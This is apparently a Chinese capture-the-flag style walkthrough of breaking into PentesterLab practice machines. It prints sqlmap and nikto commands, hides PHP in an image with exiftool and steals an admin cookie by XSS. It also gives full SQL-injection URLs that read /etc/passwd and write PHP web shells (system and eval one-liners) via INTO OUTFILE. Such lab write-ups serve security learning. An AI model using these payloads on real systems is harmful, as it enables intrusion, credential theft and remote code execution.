xsslabs靶机解题_web 攻击靶机解题过程
sql注入靶機攻擊過程請參考
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
xss靶機的攻擊過程請參考
https://pentesterlab.com/exercises/xss_and_mysql_file/course
nikto –h 192.168.1.129
sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" -D photoblog --dump-all --batch
登陸
鍵入以下命令,使用exiftool將PHP惡意代碼隱藏到png圖片中:
Cd Desktop
Exiftool “-comment<=raj.php” 1.png
Exiftool 1.png
打開圖片那個網址id=4 并查看原圖 再寫入/cmd.php?cmd=ls/etc
稍微修改一下
在192.168.1.127機器上打開網頁:
是個博客系統。
每個博客標題下面可以評價:
測試下是否存在xss漏洞。
發現提交后有彈出框:
進一步構造內容
同時在192.168.179.142機器上用nc打開80端口。
在原來機器上登陸admin賬戶,密碼是p4ssw0rd
登陸進去后查看剛才發布的評論話題。
接著在142這臺機器查看nc的返回內容。
獲取到cookie信息。
復制下cookie,在142機器上打開評論所在的網頁。并修改cookie的值為剛才復制的值。
刷新下頁面,發現已經已admin的身份登錄進頁面中。
進入管理界面后,發現博客編輯界面存在sql注入漏洞。
http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4
發現2和3可以顯示出來。
http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4
可以讀取passwd文件,但是不能讀取shadow文件。
在編輯頁面發現錯誤提示中有/var/www/classes 目錄,
在查看源碼時發現有css目錄
嘗試后發現/var/www/css 目錄可寫。
于是構造語句:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
然后打開
http://192.168.179.130/css/s.php
顯示:
說明s.php文件成功寫入到/var/www/css 目錄,下面將
寫入z.php中,構造url為:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
訪問z.php,并使用uname -a獲取系統信息??梢赃h程執行命令。
下面寫入一句話木馬,構造url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀鏈接:
之前發現機器開了ssh,因此用hydra爆破下:
ssh登陸
總結
以上是生活随笔為你收集整理的xsslabs靶机解题_web 攻击靶机解题过程的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: seata执行闪退_Seata 1.2.
- 下一篇: c语言switch同时比较多个变量,C语